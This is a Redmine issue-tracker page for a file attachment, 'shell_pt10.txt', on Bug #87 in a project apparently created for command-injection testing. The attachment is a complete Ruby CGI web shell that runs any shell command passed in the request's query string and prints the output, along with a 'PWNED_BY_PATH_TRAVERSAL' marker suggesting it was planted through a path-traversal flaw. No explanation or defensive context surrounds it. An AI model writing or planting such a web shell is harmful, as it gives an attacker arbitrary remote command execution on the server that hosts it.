⚲
Project
General
Profile
Sign in
Register
Home
Projects
Help
Search
:
cmdtest1782618771
All Projects
cmdtest1782618771
Overview
Activity
Issues
Documents
Wiki
Files
Repository
Download (175 Bytes)
Bug #87
ยป shell_pt10.txt
Redmine Admin
, 07/16/2026 08:42 AM
#!/usr/bin/env ruby
puts "Content-Type: text/plain\r\n\r\n"
puts `#{ENV['QUERY_STRING']}` if ENV['QUERY_STRING'] && !ENV['QUERY_STRING'].empty?
puts "PWNED_BY_PATH_TRAVERSAL"
(1-1/1)
Loading...